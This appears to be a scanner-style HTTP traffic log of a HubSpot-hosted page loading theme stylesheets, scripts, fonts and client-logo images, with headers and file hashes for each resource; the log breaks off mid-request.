User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         199.60.103.254
HTTP/2 200 OK
content-type: image/jpeg
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
content-length: 278074
cf-ray: 74ab54882d77b51d-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 25716
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
etag: "c83bc29a87114e8e700922654fc8a888"
last-modified: Tue, 11 Dec 2018 17:17:13 GMT
strict-transport-security: max-age=31536000
vary: Accept-Encoding
via: 1.1 bfeae0ecbffe44ad98e5cd0ae83bdb4a.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-6752477065,FD-5987776827,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origSize=305715, status=webp_bigger
edge-cache-tag: F-6752477065,FD-5987776827,P-275827,FLS-ALL
x-amz-cf-id: 78UNxBXXc6IQMkolNLJ-2mN3_qElRDRqD9Z8Ixe-0GWbKpB_rNTT1g==
x-amz-cf-pop: ARN56-P1
x-amz-id-2: oWqLIlMzN5uvFa6YHkgpo+PLxpQl+XWuhEMuj6vWY9GPvJ0aycqM7LLNYIumvmjsFJLleK8cnEI=
x-amz-meta-cache-tag: F-6752477065,FD-5987776827,P-275827,FLS-ALL
x-amz-request-id: B7M52HGBE8AH4FMZ
x-amz-version-id: q.wNl0WaWucSMi8QYT59BSQdbGZRKDEb
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
x-hs-https-only: worker
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0S%2Fwomfw184OQ8N%2FumyjpREAGErz%2BQ2we5VM7FQqu8r30fTJmTtX6XDmn6zwqVP49x3V%2FRn0qmYcQaLiAiK%2FTMlq26po2Tx48zhz144%2FIfSdQ%2FAzDL7HFUd7Y6nRNM%2FCdmD1"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: __cf_bm=uImj_Lwz3mz2cNZojVoFhm24kboPmjEiUDgABzKtjxA-1663181656-0-AbPT/5xT2M+MmptEQ6CJNpNVBK8lR+jsvB4NO4FRlsv3b9s6sNmPljKW8PX28AMfhHcYmsLX/sNdCTN8qQd7fLA=; path=/; expires=Wed, 14-Sep-22 19:24:16 GMT; domain=.www.lean-labs.com; HttpOnly; Secure; SameSite=None __cfruid=415bbb7d53e096fecf9e730c76bf1e1790943fb6-1663181656; path=/; domain=.www.lean-labs.com; HttpOnly; Secure; SameSite=None
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], progressive, precision 8, 2880x1958, components 3\012- data
Size:   278074
Md5:    77de0dfc7063d547a20f260ade8123b6
Sha1:   4a494659cbe0ed89c9fd8192f59e8036c0ceb04f
Sha256: 676c068451bb86a8562138ea1641517afc1fb87819c8212e711ea47bac92650c
                                        
                                            GET /hub/26246936/hub_generated/template_assets/53117121739/1663156038137/marketplace/Sprocket_Rocket/sr-theme-free/css/sr-base.min.css HTTP/1.1 
Host: cdn1.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: text/css
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74ab5486f893b52d-OSL
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=1209600
ETag: W/"a034c0cb06aab3ae7329c7fcf548bb86"
Expires: Wed, 28 Sep 2022 18:54:16 GMT
Last-Modified: Wed, 14 Sep 2022 11:47:20 GMT
Vary: Accept-Encoding
Via: 1.1 227a1815a1677b9cf6dd587e443000b8.cloudfront.net (CloudFront)
CF-Cache-Status: REVALIDATED
Access-Control-Allow-Methods: GET
X-Amz-Cf-Id: eEeTgzox4mQnUbfk32woVhH4WO-Rh-5Xxs5HstvZsMLp1iGljVQIhw==
X-Amz-Cf-Pop: OSL50-P1
x-amz-id-2: GEoScNlY3RY+W8eP9fARismE9ziCJmIYLnRvwSo8zBESrLBxb4ELYFI8GhD+gpHYLWTqATO3hfc=
x-amz-meta-created-unix-time-millis: 1663156039053
x-amz-request-id: E4632G2SAK3S975Z
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-version-id: 8Gnw.tLvBXShIILkllBZ0xddBtensMPp
X-Cache: RefreshHit from cloudfront
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (65536), with no line terminators
Size:   10289
Md5:    002069daafeb38a2d0947d0949775f1d
Sha1:   5f548d13bce90cc5381e9abd0551e709e9552a51
Sha256: f7706fbf5b79cd01d99dc49d22a09e6c90ef4c3d18ca342828dd94fcd2adc95d
                                        
                                            GET /hub/26246936/hub_generated/template_assets/53117121742/1663156035455/marketplace/Sprocket_Rocket/sr-theme-free/js/interaction.min.js HTTP/1.1 
Host: f.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/

                                         
                                         172.64.153.30
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74ab54871d6e0b61-OSL
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=1209600
ETag: W/"7aaf15d8888fb0d938235508aaa643ff"
Expires: Wed, 28 Sep 2022 18:54:16 GMT
Last-Modified: Wed, 14 Sep 2022 11:47:16 GMT
Vary: Accept-Encoding
CF-Cache-Status: MISS
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663156035636
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (651)
Size:   482
Md5:    a8ec1039a995911412902cb4717fd404
Sha1:   3d293889f7a140349035cc1430d0d690fe2fc101
Sha256: 58fcc8942d038edb40d8b78169d7376cfff6b92d7b0c0269cc7c330071e94c9a
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/hirevibe-01.png?width=146&height=76&name=hirevibe-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
content-length: 1514
cf-ray: 74ab54888a65b52d-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 21162
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="hirevibe-01.webp"
etag: "f4a30fecd8660f5da52c510403afdf91"
last-modified: Tue, 14 May 2019 15:32:27 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 16df6ade68382d048f8aad1f7e39da28.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-9555291586,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=4194
edge-cache-tag: F-9555291586,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: o1LH6fZtxmzVKotaOMr8Pns9286gTyi_I2C1qI6Ib0QI-4JiamsLfA==
x-amz-cf-pop: IAD12-P3
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   1514
Md5:    cf95d3460c4507a59e3a53c64466047d
Sha1:   b0c84c4e9fbdfd64529a3a2c70fde1c35d7d2aa3
Sha256: acf2f13e778a3ac3199b8b252a2387e8da87f68c96faa4ee91dfac736b300bac
                                        
                                            GET /css?family=Poppins:regular,300,600&display=swap HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Wed, 14 Sep 2022 18:54:16 GMT
date: Wed, 14 Sep 2022 18:54:16 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   3195
Md5:    1eabc1b2595b8a7649b3d404dd1dd13d
Sha1:   e95f942c6282a85f1af314894586d4e11886ff4b
Sha256: 25dc6b78d31e85ceeeaa666bf715fd5c37bcb3bf85ffdbee1f50ddc407b6dd7f
                                        
                                            GET /hub/275827/hubfs/sr-assets/images/sr-logo@2x.png?width=220&height=50&name=sr-logo@2x.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
content-length: 3732
cf-ray: 74ab54888a5bb52d-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 21163
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="sr-logo@2x.webp"
etag: "59c1225e9f3a62bab92559267927d780"
last-modified: Tue, 06 Sep 2022 02:12:34 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 e21fbbed60133ff896ee44224814dc5c.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-9889655840,FD-9889336472,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=13061
edge-cache-tag: F-9889655840,FD-9889336472,P-275827,FLS-ALL
x-amz-cf-id: RePgr6s-4k_9ZJTuSjFcVo3yyJ7qxdFtJcxYGaJhejE28TNQvi6nVQ==
x-amz-cf-pop: IAD12-P3
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   3732
Md5:    063485242fc42d804986b23d560573e8
Sha1:   70e915df8932e3346959fc922309a6b6710c0b41
Sha256: 95a4d783c21a40bf91f5312cf1ad9beaf702be65f04bc7214a277795d536c624
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/logo-alphabet-01.png?width=216&height=56&name=logo-alphabet-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
content-length: 2300
cf-ray: 74ab54888a61b52d-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 21163
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="logo-alphabet-01.webp"
etag: "4e953fa65bb59372af3fda0982b27093"
last-modified: Tue, 14 May 2019 15:32:26 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 36b04143ac1626bb30bb225fb2cccb1e.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-6589371902,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=6837
edge-cache-tag: F-6589371902,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: cY7UOLJHa20H1mcl2Co5yn0ClpUVBSOyYampxPkiYyTeuZxyxp3zLA==
x-amz-cf-pop: IAD12-P3
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2300
Md5:    ca39d37fd2b94ce26df4357045b1c80b
Sha1:   7ce08836730461305cda41b524f22dc497899c74
Sha256: 8d8eda0dd2720b65ee680d0ae28536401a8a2f38730b9055e3953c1ba734d43a
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/precision-hawk-01.png?width=216&height=20&name=precision-hawk-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
content-length: 2860
cf-ray: 74ab54888a6cb52d-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 21162
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="precision-hawk-01.webp"
etag: "a23bf1a95aac0362a9f667252a32c368"
last-modified: Tue, 14 May 2019 15:32:27 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 979084a90b32fe3f5fdc377fb6e67b76.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-9555223614,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=6523
edge-cache-tag: F-9555223614,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: acQyKRdQy8n28pvLbRB_1W6BrYGBUjJwx1B4qv5zKJhk29-9Xy05Nw==
x-amz-cf-pop: IAD89-P1
x-cache: Hit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2860
Md5:    36454962763724292d451e1542478eda
Sha1:   14a93c0719abb4c844cf2861d28a99bc9759c8a2
Sha256: ed1d4dbb208eca6bcbd25f6b993d4beb45dfd46294d6cf665165949ce2dbc0db
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /hub/26246936/hub_generated/template_assets/53117121741/1663156028974/marketplace/Sprocket_Rocket/sr-theme-free/css/bootstrap.min.css HTTP/1.1 
Host: cdn1.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: text/css
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74ab54870a0cb529-OSL
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=1209600
ETag: W/"c88bd7615d4ee2fd33a13cb75405c830"
Expires: Wed, 28 Sep 2022 18:54:16 GMT
Last-Modified: Wed, 14 Sep 2022 11:47:11 GMT
Vary: Accept-Encoding
Via: 1.1 b053873243f91b1bb6dc406ce0c67db4.cloudfront.net (CloudFront)
CF-Cache-Status: REVALIDATED
Access-Control-Allow-Methods: GET
X-Amz-Cf-Id: K6nRyT9uDW41t2WPE2MUoI-UzkpS_1hL9_uoKASTbqeV6r5jq0LUPA==
X-Amz-Cf-Pop: OSL50-P1
x-amz-id-2: 36Be7wHyHEEOf2F1wdahRkWQ6gNp5aA/Nk4hCzwanVFkYeXjD8mdClBOs8Y8Na5apGkrg2/o0z8=
x-amz-meta-created-unix-time-millis: 1663156030393
x-amz-request-id: E46DXWE3ZE4BQY55
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-version-id: DeLv0lvfDoMeJaIXttGZVwetqbFKKiUG
X-Cache: RefreshHit from cloudfront
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (60403), with CRLF line terminators
Size:   10557
Md5:    32b3e9164c49c97d4adde88f657a6b7e
Sha1:   c6f168becfed8089e060db9e9521a42b612399f0
Sha256: 31f9d2cdd152be4f8ba18cf0b20c2734248bc956df1715345bbbb1c580d8f902
                                        
                                            GET /font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1 
Host: maxcdn.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.18.11.207
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
vary: Accept-Encoding
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: SE
cdn-edgestorageid: 722, 617
last-modified: Mon, 25 Jan 2021 22:04:55 GMT
cdn-cachedat: 2021-03-10 20:26:20
cdn-requestpullsuccess: True
cdn-requestpullcode: 200
cache-control: public, max-age=31919000
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
x-content-type-options: nosniff
cdn-requestid: 121d365db7a9aba3915641185d93b963
cdn-cache: HIT
cf-cache-status: HIT
age: 12492463
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74ab54872b30b51b-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (30837)
Size:   9963
Md5:    7a3ae8626ab0472d8fc48e1f156b2f79
Sha1:   3c2d2147c00d3ff0f51520276db0105a0035855a
Sha256: f1e28ceab528ed8633b40d5f0b423ef405f97373c78bff730a23196c52789a96
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/smartmail-01.png?width=216&height=48&name=smartmail-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
content-length: 2058
cf-ray: 74ab54889a6fb52d-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 21162
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="smartmail-01.webp"
etag: "cea6cb5f7cf365a77bfbd59e3bbf1cd4"
last-modified: Tue, 14 May 2019 15:32:27 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 3d4bfc42e9575ee1f9559241c9e3f464.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-9555425370,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=5846
edge-cache-tag: F-9555425370,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: uvFQYdfYk5kpkQTNroMb8cJONwjnofFVO8zeQ_CXgsLecb4ColHHZw==
x-amz-cf-pop: IAD12-P3
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2058
Md5:    b9de48b252120fc5c381efef8b31a090
Sha1:   0611ffc3e95d5d607bb0ba17849105fa20ca33c9
Sha256: c2d59834fe4a5b9c001fbc46c1bf9c40254365be7e03f79f27bbaf2758e93e75
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/qualio-01.png?width=216&height=60&name=qualio-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
content-length: 2868
cf-ray: 74ab54888a63b52d-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 21162
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="qualio-01.webp"
etag: "e31e7490353b4655f5ea5ec34be34e50"
last-modified: Tue, 14 May 2019 15:32:27 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 736ad67f05a9a5a8fd5ed8cba30196f4.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-9555223454,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=8692
edge-cache-tag: F-9555223454,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: IG7oRhGd0rt0xNXk7Okgc3dIcMqotqkaJLFlTmb0VKKStL7a9VJPkg==
x-amz-cf-pop: IAD12-P3
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2868
Md5:    2968c5068d55383be7df5b6edeedbec5
Sha1:   1aa3f7d2b597f4952402372d641bce5b47693119
Sha256: 746b0e9d3c407413c00d624f2e4f50a137f981a8eddc23aeedd625074942ad39
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/logo-airbnb-01.png?width=216&height=68&name=logo-airbnb-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
content-length: 2536
cf-ray: 74ab54888a5fb52d-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 21163
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="logo-airbnb-01.webp"
etag: "8272f107647148a70bf19428d65408d9"
last-modified: Tue, 14 May 2019 15:32:25 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 0501dadffc52b06a0cf6aadc57586acc.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-6589325565,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=7383
edge-cache-tag: F-6589325565,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: De3VeFTJF9Nw-18aUmR4I4ttZ4nTX-YS1wZCChOA3XPb12XbUrp3aQ==
x-amz-cf-pop: IAD89-P1
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2536
Md5:    1a4cc65de36d8bcd2eb456231b373d17
Sha1:   3495f83209d24b6ce75d0b87c83805117004ab13
Sha256: 846b71545820c891fd3bc6a00da4ea1d5743f0bdfd1401937d5beeb3749c3fc0
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/logo-fitbit-01.png?width=216&height=60&name=logo-fitbit-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
